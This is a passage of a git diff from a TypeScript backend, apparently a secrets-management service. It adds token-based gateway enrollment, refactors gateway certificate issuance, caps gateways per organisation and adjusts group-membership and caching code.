TGetGatewayPoolByIdDTO = { + poolId: string; +} & OrgServiceActor; + +export type TUpdateGatewayPoolDTO = { + poolId: string; + name?: string; +} & OrgServiceActor; + +export type TDeleteGatewayPoolDTO = { + poolId: string; +} & OrgServiceActor; + +export type TAddGatewayToPoolDTO = { + poolId: string; + gatewayId: string; +} & OrgServiceActor; + +export type TRemoveGatewayFromPoolDTO = { + poolId: string; + gatewayId: string; +} & OrgServiceActor; + +export type TGetPlatformConnectionDetailsByPoolIdDTO = { + poolId: string; + targetHost: string; + targetPort: number; +}; diff --git a/backend/src/ee/services/gateway-v2/gateway-enrollment-token-dal.ts b/backend/src/ee/services/gateway-v2/gateway-enrollment-token-dal.ts new file mode 100644 index 00000000000..18bbecc4515 --- /dev/null +++ b/backend/src/ee/services/gateway-v2/gateway-enrollment-token-dal.ts @@ -0,0 +1,9 @@ +import { TDbClient } from "@app/db"; +import { TableName } from "@app/db/schemas"; +import { ormify } from "@app/lib/knex"; + +export type TGatewayEnrollmentTokenDALFactory = ReturnType; + +export const gatewayEnrollmentTokenDALFactory = (db: TDbClient) => { + return ormify(db, TableName.GatewayEnrollmentTokens); +}; diff --git a/backend/src/ee/services/gateway-v2/gateway-v2-constants.ts b/backend/src/ee/services/gateway-v2/gateway-v2-constants.ts index 7e41de91c61..971c58bea30 100644 --- a/backend/src/ee/services/gateway-v2/gateway-v2-constants.ts +++ b/backend/src/ee/services/gateway-v2/gateway-v2-constants.ts @@ -1,3 +1,5 @@ +export const GATEWAY_HEARTBEAT_TIMEOUT_MS = 60 * 60 * 1000; // 1 hour + export const GATEWAY_ROUTING_INFO_OID = "1.3.6.1.4.1.12345.100.1"; export const GATEWAY_ACTOR_OID = "1.3.6.1.4.1.12345.100.2"; export const PAM_INFO_OID = "1.3.6.1.4.1.12345.100.3"; diff --git a/backend/src/ee/services/gateway-v2/gateway-v2-dal.ts b/backend/src/ee/services/gateway-v2/gateway-v2-dal.ts index a5534e0e3f2..9c03e50e1fa 100644 --- a/backend/src/ee/services/gateway-v2/gateway-v2-dal.ts +++ b/backend/src/ee/services/gateway-v2/gateway-v2-dal.ts @@ -22,7 +22,7 @@ export const gatewayV2DalFactory = (db: TDbClient) => { const query = (tx || db.replicaNode())(TableName.GatewayV2) // eslint-disable-next-line @typescript-eslint/no-misused-promises .where(buildFindFilter(regularFilter, TableName.GatewayV2)) - .join(TableName.Identity, `${TableName.Identity}.id`, `${TableName.GatewayV2}.identityId`) + .leftJoin(TableName.Identity, `${TableName.Identity}.id`, `${TableName.GatewayV2}.identityId`) .select(selectAllTableCols(TableName.GatewayV2)) .select(db.ref("name").withSchema(TableName.Identity).as("identityName")); @@ -54,7 +54,7 @@ export const gatewayV2DalFactory = (db: TDbClient) => { return docs.map((el) => ({ ...GatewaysV2Schema.parse(el), - identity: { id: el.identityId, name: el.identityName } + identity: el.identityId ? { id: el.identityId, name: el.identityName } : null })); } catch (error) { throw new DatabaseError({ error, name: `${TableName.GatewayV2}: Find` }); @@ -76,5 +76,14 @@ export const gatewayV2DalFactory = (db: TDbClient) => { } }; - return { ...orm, find, findById }; + const countByOrgId = async (orgId: string, tx?: Knex) => { + try { + const result = await (tx || db.replicaNode())(TableName.GatewayV2).where({ orgId }).count("id").first(); + return parseInt(String(result?.count || "0"), 10); + } catch (error) { + throw new DatabaseError({ error, name: `${TableName.GatewayV2}: Count by org id` }); + } + }; + + return { ...orm, find, findById, countByOrgId }; }; diff --git a/backend/src/ee/services/gateway-v2/gateway-v2-service.ts b/backend/src/ee/services/gateway-v2/gateway-v2-service.ts index c1f8d81c743..ed2d525d14e 100644 --- a/backend/src/ee/services/gateway-v2/gateway-v2-service.ts +++ b/backend/src/ee/services/gateway-v2/gateway-v2-service.ts @@ -3,8 +3,9 @@ import net from "node:net"; import { ForbiddenError } from "@casl/ability"; import * as x509 from "@peculiar/x509"; -import { OrganizationActionScope, OrgMembershipRole, OrgMembershipStatus, TRelays } from "@app/db/schemas"; +import { OrganizationActionScope, OrgMembershipRole, OrgMembershipStatus, TableName, TRelays } from "@app/db/schemas"; import { PgSqlLock } from "@app/keystore/keystore"; +import { getConfig } from "@app/lib/config/env"; import { crypto } from "@app/lib/crypto"; import { DatabaseErrorCode } from "@app/lib/error-codes"; import { BadRequestError, DatabaseError, NotFoundError } from "@app/lib/errors"; @@ -14,7 +15,7 @@ import { withGatewayV2Proxy } from "@app/lib/gateway-v2/gateway-v2"; import { logger } from "@app/lib/logger"; import { OrgServiceActor } from "@app/lib/types"; import { TAppConnectionDALFactory } from "@app/services/app-connection/app-connection-dal"; -import { ActorAuthMethod, ActorType } from "@app/services/auth/auth-type"; +import { ActorAuthMethod, ActorType, AuthTokenType } from "@app/services/auth/auth-type"; import { constructPemChainFromCerts } from "@app/services/certificate/certificate-fns"; import { CertExtendedKeyUsage, CertKeyAlgorithm, CertKeyUsage } from "@app/services/certificate/certificate-types"; import { @@ -39,16 +40,21 @@ import { TPermissionServiceFactory } from "../permission/permission-service-type import { TPkiDiscoveryConfigDALFactory } from "../pki-discovery/pki-discovery-config-dal"; import { TRelayDALFactory } from "../relay/relay-dal"; import { TRelayServiceFactory } from "../relay/relay-service"; +import { TGatewayEnrollmentTokenDALFactory } from "./gateway-enrollment-token-dal"; import { GATEWAY_ACTOR_OID, GATEWAY_ROUTING_INFO_OID, PAM_INFO_OID } from "./gateway-v2-constants"; import { TGatewayV2DALFactory } from "./gateway-v2-dal"; import { GatewayHealthCheckStatus, TGatewayV2ConnectionDetails } from "./gateway-v2-types"; import { TOrgGatewayConfigV2DALFactory } from "./org-gateway-config-v2-dal"; +// Temporary limit until gateway limiting is implemented at the relay level +const MAX_GATEWAYS_PER_ORG = 50; + type TGatewayV2ServiceFactoryDep = { orgGatewayConfigV2DAL: Pick; kmsService: TKmsServiceFactory; relayService: TRelayServiceFactory; gatewayV2DAL: TGatewayV2DALFactory; + gatewayEnrollmentTokenDAL: TGatewayEnrollmentTokenDALFactory; relayDAL: TRelayDALFactory; permissionService: TPermissionServiceFactory; orgDAL: Pick; @@ -70,6 +76,7 @@ export const gatewayV2ServiceFactory = ({ kmsService, relayService, gatewayV2DAL, + gatewayEnrollmentTokenDAL, relayDAL, permissionService, orgDAL, @@ -82,6 +89,15 @@ export const gatewayV2ServiceFactory = ({ aiMcpServerDAL, pkiDiscoveryConfigDAL }: TGatewayV2ServiceFactoryDep) => { + const ENROLLMENT_TOKEN_TTL_SECONDS = 3600; + + const $generateEnrollmentToken = () => { + const plainToken = `gwe_${crypto.randomBytes(32).toString("base64url")}`; + const tokenHash = crypto.nativeCrypto.createHash("sha256").update(plainToken).digest("hex"); + const expiresAt = new Date(Date.now() + ENROLLMENT_TOKEN_TTL_SECONDS * 1000); + return { plainToken, tokenHash, expiresAt }; + }; + const $validateIdentityAccessToGateway = async (orgId: string, actorId: string, actorAuthMethod: ActorAuthMethod) => { const { permission } = await permissionService.getOrgPermission({ scope: OrganizationActionScope.Any, @@ -337,9 +353,27 @@ export const gatewayV2ServiceFactory = ({ countMap.set(id, (countMap.get(id) ?? 0) + count); } + // Check enrollment token status for each gateway + const allTokens = await gatewayEnrollmentTokenDAL.find({ orgId: orgPermission.orgId }); + const now = new Date(); + const tokenStatusMap = new Map(); + for (const token of allTokens) { + if (!token.usedAt && token.gatewayId) { + const isExpired = token.expiresAt <= now; + const current = tokenStatusMap.get(token.gatewayId); + // A non-expired token takes priority over an expired one + if (!isExpired) { + tokenStatusMap.set(token.gatewayId, "pending"); + } else if (!current) { + tokenStatusMap.set(token.gatewayId, "expired"); + } + } + } + return gateways.map((gateway) => ({ ...gateway, - connectedResourcesCount: countMap.get(gateway.id) ?? 0 + connectedResourcesCount: countMap.get(gateway.id) ?? 0, + enrollmentTokenStatus: tokenStatusMap.get(gateway.id) ?? null })); }; @@ -648,31 +682,152 @@ export const gatewayV2ServiceFactory = ({ }; }; + const $issueGatewayCerts = async ({ + orgId, + orgCAs, + relayName, + gateway + }: { + orgId: string; + orgCAs: Awaited>; + relayName: string; + gateway: { id: string; name: string }; + }) => { + const alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_2048); + const gatewayServerCaCert = new x509.X509Certificate(orgCAs.gatewayServerCaCertificate); + const rootGatewayCaCert = new x509.X509Certificate(orgCAs.rootGatewayCaCertificate); + const gatewayClientCaCert = new x509.X509Certificate(orgCAs.gatewayClientCaCertificate); + + const gatewayServerCaSkObj = crypto.nativeCrypto.createPrivateKey({ + key: orgCAs.gatewayServerCaPrivateKey, + format: "der", + type: "pkcs8" + }); + const gatewayServerCaPrivateKey = await crypto.nativeCrypto.subtle.importKey( + "pkcs8", + gatewayServerCaSkObj.export({ format: "der", type: "pkcs8" }), + alg, + true, + ["sign"] + ); + + const gatewayServerKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]); + const gatewayServerCertIssuedAt = new Date(); + const gatewayServerCertExpireAt = new Date(new Date().setDate(new Date().getDate() + 1)); + const gatewayServerCertPrivateKey = crypto.nativeCrypto.KeyObject.from(gatewayServerKeys.privateKey); + + const gatewayServerCertExtensions: x509.Extension[] = [ + new x509.BasicConstraintsExtension(false), + await x509.AuthorityKeyIdentifierExtension.create(gatewayServerCaCert, false), + await x509.SubjectKeyIdentifierExtension.create(gatewayServerKeys.publicKey), + new x509.CertificatePolicyExtension(["2.5.29.32.0"]), // anyPolicy + new x509.KeyUsagesExtension( + // eslint-disable-next-line no-bitwise + x509.KeyUsageFlags[CertKeyUsage.DIGITAL_SIGNATURE] | x509.KeyUsageFlags[CertKeyUsage.KEY_ENCIPHERMENT], + true + ), + new x509.ExtendedKeyUsageExtension([x509.ExtendedKeyUsage[CertExtendedKeyUsage.SERVER_AUTH]], true), + new x509.SubjectAlternativeNameExtension([ + { type: "dns", value: "localhost" }, + { type: "ip", value: "127.0.0.1" }, + { type: "ip", value: "::1" } + ]) + ]; + + const gatewayServerSerialNumber = createSerialNumber(); + const gatewayServerCertificate = await x509.X509CertificateGenerator.create({ + serialNumber: gatewayServerSerialNumber, + subject: `O=${orgId},CN=Gateway`, + issuer: gatewayServerCaCert.subject, + notBefore: gatewayServerCertIssuedAt, + notAfter: gatewayServerCertExpireAt, + signingKey: gatewayServerCaPrivateKey, + publicKey: gatewayServerKeys.publicKey, + signingAlgorithm: alg, + extensions: gatewayServerCertExtensions + }); + + const relayCredentials = await relayService.getCredentialsForGateway({ + relayName, + orgId, + gatewayId: gateway.id, + gatewayName: gateway.name + }); + + return { + gatewayId: gateway.id, + relayHost: relayCredentials.relayHost, + pki: { + serverCertificate: gatewayServerCertificate.toString("pem"), + serverPrivateKey: gatewayServerCertPrivateKey.export({ format: "pem", type: "pkcs8" }).toString(), + clientCertificateChain: constructPemChainFromCerts([gatewayClientCaCert, rootGatewayCaCert]) + }, + ssh: { + clientCertificate: relayCredentials.clientSshCert, + clientPrivateKey: relayCredentials.clientSshPrivateKey, + serverCAPublicKey: relayCredentials.serverCAPublicKey + } + }; + }; + const registerGateway = async ({ orgId, actorId, + actorType, actorAuthMethod, relayName, name }: { orgId: string; actorId: string; + actorType: ActorType; actorAuthMethod: ActorAuthMethod; - relayName: string; - name: string; + relayName?: string; + name?: string; }) => { - await $validateIdentityAccessToGateway(orgId, actorId, actorAuthMethod); const orgCAs = await $getOrgCAs(orgId); - let relay: TRelays = await relayDAL.findOne({ orgId, name: relayName }); - if (!relay) { - relay = await relayDAL.findOne({ name: relayName, orgId: null }); + // Enrollment-flow gateways authenticate with GATEWAY_ACCESS_TOKEN β€” the gateway row + // already exists, so we just look it up and issue fresh certs using its stored relay. + if (actorType === ActorType.GATEWAY) { + const gateway = await gatewayV2DAL.findById(actorId); + if (!gateway || gateway.orgId !== orgId) { + throw new NotFoundError({ message: `Gateway ${actorId} not found` }); + } + + let resolvedRelay: TRelays | undefined; + if (relayName) { + resolvedRelay = await relayDAL.findOne({ orgId, name: relayName }); + if (!resolvedRelay) resolvedRelay = await relayDAL.findOne({ name: relayName, orgId: null }); + if (!resolvedRelay) throw new NotFoundError({ message: `Relay ${relayName} not found` }); + + if (resolvedRelay.id !== gateway.relayId) { + await gatewayV2DAL.updateById(gateway.id, { relayId: resolvedRelay.id }); + } + } else { + if (!gateway.relayId) throw new NotFoundError({ message: "No relay associated with this gateway" }); + resolvedRelay = await relayDAL.findById(gateway.relayId); + if (!resolvedRelay) throw new NotFoundError({ message: "No relay associated with this gateway" }); + } + + return $issueGatewayCerts({ orgId, orgCAs, relayName: resolvedRelay.name, gateway }); + } + + // Identity-based flow: upsert the gateway row then issue certs. + await $validateIdentityAccessToGateway(orgId, actorId, actorAuthMethod); + + if (!name) { + throw new BadRequestError({ message: "Gateway name is required" }); } - if (!relay) { - throw new NotFoundError({ message: `Relay ${relayName} not found` }); + if (!relayName) { + throw new BadRequestError({ message: "Relay name is required" }); } + let relay: TRelays = await relayDAL.findOne({ orgId, name: relayName }); + if (!relay) relay = await relayDAL.findOne({ name: relayName, orgId: null }); + if (!relay) throw new NotFoundError({ message: `Relay ${relayName} not found` }); + try { const [gateway] = await gatewayV2DAL.upsert( [ @@ -686,84 +841,10 @@ export const gatewayV2ServiceFactory = ({ ["identityId"] ); - const alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_2048); - const gatewayServerCaCert = new x509.X509Certificate(orgCAs.gatewayServerCaCertificate); - const rootGatewayCaCert = new x509.X509Certificate(orgCAs.rootGatewayCaCertificate); - const gatewayClientCaCert = new x509.X509Certificate(orgCAs.gatewayClientCaCertificate); - - const gatewayServerCaSkObj = crypto.nativeCrypto.createPrivateKey({ - key: orgCAs.gatewayServerCaPrivateKey, - format: "der", - type: "pkcs8" - }); - const gatewayServerCaPrivateKey = await crypto.nativeCrypto.subtle.importKey( - "pkcs8", - gatewayServerCaSkObj.export({ format: "der", type: "pkcs8" }), - alg, - true, - ["sign"] - ); - - const gatewayServerKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]); - const gatewayServerCertIssuedAt = new Date(); - const gatewayServerCertExpireAt = new Date(new Date().setDate(new Date().getDate() + 1)); - const gatewayServerCertPrivateKey = crypto.nativeCrypto.KeyObject.from(gatewayServerKeys.privateKey); - - const gatewayServerCertExtensions: x509.Extension[] = [ - new x509.BasicConstraintsExtension(false), - await x509.AuthorityKeyIdentifierExtension.create(gatewayServerCaCert, false), - await x509.SubjectKeyIdentifierExtension.create(gatewayServerKeys.publicKey), - new x509.CertificatePolicyExtension(["2.5.29.32.0"]), // anyPolicy - new x509.KeyUsagesExtension( - // eslint-disable-next-line no-bitwise - x509.KeyUsageFlags[CertKeyUsage.DIGITAL_SIGNATURE] | x509.KeyUsageFlags[CertKeyUsage.KEY_ENCIPHERMENT], - true - ), - new x509.ExtendedKeyUsageExtension([x509.ExtendedKeyUsage[CertExtendedKeyUsage.SERVER_AUTH]], true), - new x509.SubjectAlternativeNameExtension([ - { type: "dns", value: "localhost" }, - { type: "ip", value: "127.0.0.1" }, - { type: "ip", value: "::1" } - ]) - ]; - - const gatewayServerSerialNumber = createSerialNumber(); - const gatewayServerCertificate = await x509.X509CertificateGenerator.create({ - serialNumber: gatewayServerSerialNumber, - subject: `O=${orgId},CN=Gateway`, - issuer: gatewayServerCaCert.subject, - notBefore: gatewayServerCertIssuedAt, - notAfter: gatewayServerCertExpireAt, - signingKey: gatewayServerCaPrivateKey, - publicKey: gatewayServerKeys.publicKey, - signingAlgorithm: alg, - extensions: gatewayServerCertExtensions - }); - - const relayCredentials = await relayService.getCredentialsForGateway({ - relayName, - orgId, - gatewayId: gateway.id, - gatewayName: gateway.name - }); - - return { - gatewayId: gateway.id, - relayHost: relayCredentials.relayHost, - pki: { - serverCertificate: gatewayServerCertificate.toString("pem"), - serverPrivateKey: gatewayServerCertPrivateKey.export({ format: "pem", type: "pkcs8" }).toString(), - clientCertificateChain: constructPemChainFromCerts([gatewayClientCaCert, rootGatewayCaCert]) - }, - ssh: { - clientCertificate: relayCredentials.clientSshCert, - clientPrivateKey: relayCredentials.clientSshPrivateKey, - serverCAPublicKey: relayCredentials.serverCAPublicKey - } - }; + return await $issueGatewayCerts({ orgId, orgCAs, relayName, gateway }); } catch (err) { if (err instanceof DatabaseError && (err.error as { code: string })?.code === DatabaseErrorCode.UniqueViolation) { - throw new BadRequestError({ message: `Gateway with name "${name}" already exists` }); + throw new BadRequestError({ message: "A gateway with this name already exists" }); } throw err; @@ -888,6 +969,15 @@ export const gatewayV2ServiceFactory = ({ }; const heartbeat = async ({ orgPermission }: { orgPermission: OrgServiceActor }) => { + if (orgPermission.type === ActorType.GATEWAY) { + const gateway = await gatewayV2DAL.findById(orgPermission.id); + if (!gateway || gateway.orgId !== orgPermission.orgId) { + throw new NotFoundError({ message: `Gateway ${orgPermission.id} not found.` }); + } + await $checkGatewayHealth(gateway.id); + return; + } + await $validateIdentityAccessToGateway(orgPermission.orgId, orgPermission.id, orgPermission.authMethod); const gateway = await gatewayV2DAL.findOne({ @@ -939,25 +1029,26 @@ export const gatewayV2ServiceFactory = ({ }; const getPamSessionKey = async ({ orgPermission }: { orgPermission: OrgServiceActor }) => { - const { permission } = await permissionService.getOrgPermission({ - actor: orgPermission.type, - actorId: orgPermission.id, - orgId: orgPermission.orgId, - actorAuthMethod: orgPermission.authMethod, - actorOrgId: orgPermission.orgId, - scope: OrganizationActionScope.Any - }); + // Gateway actors are already authenticated via GATEWAY_ACCESS_TOKEN JWT β€” skip org permission check. + if (orgPermission.type !== ActorType.GATEWAY) { + const { permission } = await permissionService.getOrgPermission({ + actor: orgPermission.type, + actorId: orgPermission.id, + orgId: orgPermission.orgId, + actorAuthMethod: orgPermission.authMethod, + actorOrgId: orgPermission.orgId, + scope: OrganizationActionScope.Any + }); - ForbiddenError.from(permission).throwUnlessCan( - OrgPermissionGatewayActions.CreateGateways, - OrgPermissionSubjects.Gateway - ); + ForbiddenError.from(permission).throwUnlessCan( + OrgPermissionGatewayActions.CreateGateways, + OrgPermissionSubjects.Gateway + ); + } return gatewayV2DAL.transaction(async (tx) => { const gateway = await gatewayV2DAL.findOne( - { - identityId: orgPermission.id - }, + orgPermission.type === ActorType.GATEWAY ? { id: orgPermission.id } : { identityId: orgPermission.id }, tx ); @@ -1098,6 +1189,224 @@ export const gatewayV2ServiceFactory = ({ }; }; + const getGatewayById = async ({ gatewayId }: { gatewayId: string }) => { + const gateway = await gatewayV2DAL.findById(gatewayId); + if (!gateway) { + throw new NotFoundError({ message: `Gateway ${gatewayId} not found` }); + } + return gateway; + }; + + // --- V3 service methods --- + + const createGateway = async ({ + orgId, + actorId, + actorType, + actorAuthMethod, + name + }: { + orgId: string; + actorId: string; + actorType: ActorType; + actorAuthMethod: ActorAuthMethod; + name: string; + }) => { + const { permission } = await permissionService.getOrgPermission({ + actor: actorType, + actorId, + orgId, + actorAuthMethod, + actorOrgId: orgId, + scope: OrganizationActionScope.Any + }); + + ForbiddenError.from(permission).throwUnlessCan( + OrgPermissionGatewayActions.CreateGateways, + OrgPermissionSubjects.Gateway + ); + + const gateway = await gatewayV2DAL.transaction(async (tx) => { + // eslint-disable-next-line @typescript-eslint/no-unsafe-call + await tx.raw("SELECT pg_advisory_xact_lock(?)", [PgSqlLock.CreateGateway(orgId)]); + + // eslint-disable-next-line @typescript-eslint/no-unsafe-call, @typescript-eslint/no-unsafe-assignment + const existingGatewayCount = await gatewayV2DAL.countByOrgId(orgId, tx); + if (existingGatewayCount >= MAX_GATEWAYS_PER_ORG) { + throw new BadRequestError({ + message: `Organization has reached the maximum limit of ${MAX_GATEWAYS_PER_ORG} gateways` + }); + } + + try { + return await gatewayV2DAL.create({ orgId, name }, tx); + } catch (err) { + if ( + err instanceof DatabaseError && + (err.error as { code: string })?.code === DatabaseErrorCode.UniqueViolation + ) { + throw new BadRequestError({ message: `A gateway named "${name}" already exists` }); + } + throw err; + } + }); + + return gateway; + }; + + const configureTokenAuth = async ({ + orgPermission, + gatewayId + }: { + orgPermission: OrgServiceActor; + gatewayId: string; + }) => { + const { permission } = await permissionService.getOrgPermission({ + actor: orgPermission.type, + actorId: orgPermission.id, + orgId: orgPermission.orgId, + actorAuthMethod: orgPermission.authMethod, + actorOrgId: orgPermission.orgId, + scope: OrganizationActionScope.Any + }); + + ForbiddenError.from(permission).throwUnlessCan( + OrgPermissionGatewayActions.EditGateways, + OrgPermissionSubjects.Gateway + ); + + const gateway = await gatewayV2DAL.findById(gatewayId); + if (!gateway || gateway.orgId !== orgPermission.orgId) { + throw new NotFoundError({ message: `Gateway ${gatewayId} not found` }); + } + + if (gateway.identityId) { + throw new BadRequestError({ message: "Cannot configure token auth for identity-based gateways" }); + } + + const gatewayToken = $generateEnrollmentToken(); + + const record = await gatewayEnrollmentTokenDAL.transaction(async (tx) => { + // Delete any existing unused enrollment tokens for this gateway + const existingTokens = await gatewayEnrollmentTokenDAL.find({ gatewayId }, { tx }); + const unusedTokenIds = existingTokens.filter((t) => !t.usedAt).map((t) => t.id); + if (unusedTokenIds.length > 0) { + await gatewayEnrollmentTokenDAL.delete({ $in: { id: unusedTokenIds } }, tx); + } + + return gatewayEnrollmentTokenDAL.create( + { + orgId: orgPermission.orgId, + tokenHash: gatewayToken.tokenHash, + ttl: ENROLLMENT_TOKEN_TTL_SECONDS, + expiresAt: gatewayToken.expiresAt, + gatewayId + }, + tx + ); + }); + + return { ...record, token: gatewayToken.plainToken, gatewayName: gateway.name }; + }; + + const connectGateway = async ({ + orgId, + actorId, + actorType, + relayName + }: { + orgId: string; + actorId: string; + actorType: ActorType; + relayName?: string; + }) => { + const orgCAs = await $getOrgCAs(orgId); + + if (actorType === ActorType.GATEWAY) { + const gateway = await gatewayV2DAL.findById(actorId); + if (!gateway || gateway.orgId !== orgId) { + throw new NotFoundError({ message: `Gateway ${actorId} not found` }); + } + + let resolvedRelay: TRelays | undefined; + if (relayName) { + resolvedRelay = await relayDAL.findOne({ orgId, name: relayName }); + if (!resolvedRelay) resolvedRelay = await relayDAL.findOne({ name: relayName, orgId: null }); + if (!resolvedRelay) throw new NotFoundError({ message: `Relay ${relayName} not found` }); + + // Persist the relay change so future restarts use the new relay + if (resolvedRelay.id !== gateway.relayId) { + await gatewayV2DAL.updateById(gateway.id, { relayId: resolvedRelay.id }); + } + } else { + if (!gateway.relayId) throw new NotFoundError({ message: "No relay associated with this gateway" }); + resolvedRelay = await relayDAL.findById(gateway.relayId); + if (!resolvedRelay) throw new NotFoundError({ message: "No relay associated with this gateway" }); + } + + return $issueGatewayCerts({ orgId, orgCAs, relayName: resolvedRelay.name, gateway }); + } + + throw new BadRequestError({ message: "Invalid actor type for gateway connect" }); + }; + + const enrollGateway = async ({ token }: { token: string }) => { + const tokenHash = crypto.nativeCrypto.createHash("sha256").update(token).digest("hex"); + + const tokenRecord = await gatewayEnrollmentTokenDAL.findOne({ tokenHash }); + if (!tokenRecord) { + throw new BadRequestError({ message: "Invalid enrollment token" }); + } + + if (tokenRecord.expiresAt < new Date()) { + throw new BadRequestError({ message: "Enrollment token has expired" }); + } + + if (!tokenRecord.gatewayId) { + throw new BadRequestError({ message: "Enrollment token is not linked to a gateway" }); + } + + const { orgId } = tokenRecord; + + // Consume the token and bump tokenVersion in a single transaction. + const gateway = await gatewayEnrollmentTokenDAL.transaction(async (tx) => { + const rows = await tx(TableName.GatewayEnrollmentTokens) + .where({ id: tokenRecord.id }) + .whereNull("usedAt") + .update({ usedAt: new Date() }) + .returning("*"); + if (rows.length === 0) { + throw new BadRequestError({ message: "Enrollment token has already been used" }); + } + + const existing = await gatewayV2DAL.findById(tokenRecord.gatewayId!, tx); + if (!existing) throw new NotFoundError({ message: `Gateway ${tokenRecord.gatewayId} not found` }); + return gatewayV2DAL.updateById( + existing.id, + { $incr: { tokenVersion: 1 }, heartbeat: null, lastHealthCheckStatus: null }, + tx + ); + }); + + const appCfg = getConfig(); + const accessToken = crypto.jwt().sign( + { + gatewayId: gateway.id, + orgId, + authTokenType: AuthTokenType.GATEWAY_ACCESS_TOKEN, + tokenVersion: gateway.tokenVersion + }, + appCfg.AUTH_SECRET + ); + + return { + accessToken, + gatewayId: gateway.id, + gatewayName: gateway.name, + orgId + }; + }; + return { listGateways, registerGateway, @@ -1108,6 +1417,12 @@ export const gatewayV2ServiceFactory = ({ triggerHeartbeat, getPamSessionKey, healthcheckNotify, - getConnectedResources + getConnectedResources, + getGatewayById, + enrollGateway, + // V3 + createGateway, + configureTokenAuth, + connectGateway }; }; diff --git a/backend/src/ee/services/gateway/gateway-service.ts b/backend/src/ee/services/gateway/gateway-service.ts index 54be2e7146f..069d3bfb4fc 100644 --- a/backend/src/ee/services/gateway/gateway-service.ts +++ b/backend/src/ee/services/gateway/gateway-service.ts @@ -3,7 +3,7 @@ import * as x509 from "@peculiar/x509"; import { z } from "zod"; import { OrganizationActionScope } from "@app/db/schemas"; -import { KeyStorePrefixes, PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore"; import { getConfig } from "@app/lib/config/env"; import { crypto } from "@app/lib/crypto/cryptography"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; @@ -85,8 +85,6 @@ export const gatewayServiceFactory = ({ }; const getGatewayRelayDetails = async (actorId: string, actorOrgId: string, actorAuthMethod: ActorAuthMethod) => { - const TURN_CRED_EXPIRY = 10 * 60; // 10 minutes - const envCfg = getConfig(); await $validateOrgAccessToGateway(actorOrgId, actorId, actorAuthMethod); const { encryptor, decryptor } = await kmsService.createCipherPairWithDataKey({ @@ -114,7 +112,7 @@ export const gatewayServiceFactory = ({ const el = getTurnCredentials(actorId, envCfg.GATEWAY_RELAY_AUTH_SECRET); await keyStore.setItemWithExpiry( KeyStorePrefixes.GatewayIdentityCredential(actorId), - TURN_CRED_EXPIRY, + KeyStoreTtls.GatewayRelayCredentialInSeconds, encryptor({ plainText: Buffer.from(JSON.stringify({ username: el.username, password: el.password })) }).cipherTextBlob.toString("hex") diff --git a/backend/src/ee/services/group/group-fns.ts b/backend/src/ee/services/group/group-fns.ts index c9d527b59c7..208165c87c2 100644 --- a/backend/src/ee/services/group/group-fns.ts +++ b/backend/src/ee/services/group/group-fns.ts @@ -34,7 +34,7 @@ const addAcceptedUsersToGroup = async ({ await userGroupMembershipDAL.insertMany( users.map((user) => ({ - userId: user.userId, + userId: user.id, groupId: group.id, isPending: false })), @@ -82,7 +82,7 @@ const addAcceptedUsersToGroup = async ({ continue; } - const usersToAddProjectKeyFor = users.filter((u) => !userKeysSet.has(`${projectId}-${u.userId}`)); + const usersToAddProjectKeyFor = users.filter((u) => !userKeysSet.has(`${projectId}-${u.id}`)); if (usersToAddProjectKeyFor.length) { // there are users who need to be shared keys @@ -149,7 +149,7 @@ const addAcceptedUsersToGroup = async ({ encryptedKey, nonce, senderId: ghostUser.id, - receiverId: user.userId, + receiverId: user.id, projectId }; }); diff --git a/backend/src/ee/services/group/group-service.ts b/backend/src/ee/services/group/group-service.ts index 3b0a2d7539f..c2017f8cfe3 100644 --- a/backend/src/ee/services/group/group-service.ts +++ b/backend/src/ee/services/group/group-service.ts @@ -6,6 +6,8 @@ import { AccessScope, OrganizationActionScope, OrgMembershipRole, TGroups, TRole import { TOidcConfigDALFactory } from "@app/ee/services/oidc/oidc-config-dal"; import { BadRequestError, NotFoundError, PermissionBoundaryError, UnauthorizedError } from "@app/lib/errors"; import { alphaNumericNanoId } from "@app/lib/nanoid"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TGenericPermission } from "@app/lib/types"; import { TIdentityDALFactory } from "@app/services/identity/identity-dal"; import { TMembershipDALFactory } from "@app/services/membership/membership-dal"; @@ -78,10 +80,7 @@ type TGroupServiceFactoryDep = { projectDAL: Pick; projectBotDAL: Pick; projectKeyDAL: Pick; - permissionService: Pick< - TPermissionServiceFactory, - "getOrgPermission" | "getOrgPermissionByRoles" | "invalidateProjectPermissionCache" - >; + permissionService: Pick; licenseService: Pick; oidcConfigDAL: Pick; }; @@ -125,7 +124,9 @@ export const groupServiceFactory = ({ }); const [rolePermissionDetails] = await permissionService.getOrgPermissionByRoles([role], actorOrgId); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); const isCustomRole = Boolean(rolePermissionDetails?.role); if (role !== OrgMembershipRole.NoAccess) { const permissionBoundary = validatePrivilegeChangeOperation( @@ -238,7 +239,9 @@ export const groupServiceFactory = ({ if (role) { const [rolePermissionDetails] = await permissionService.getOrgPermissionByRoles([role], actorOrgId); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); const isCustomRole = Boolean(rolePermissionDetails?.role); const permissionBoundary = validatePrivilegeChangeOperation( @@ -883,7 +886,9 @@ export const groupServiceFactory = ({ const groupRoles = groupMembership.roles.map((el) => el.customRoleSlug || el.role); const [rolePermissionDetails] = await permissionService.getOrgPermissionByRoles(groupRoles, actorOrgId); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); // check if user has broader or equal to privileges than group const permissionBoundary = validatePrivilegeChangeOperation( @@ -962,7 +967,9 @@ export const groupServiceFactory = ({ const groupRoles = groupMembership.roles.map((el) => 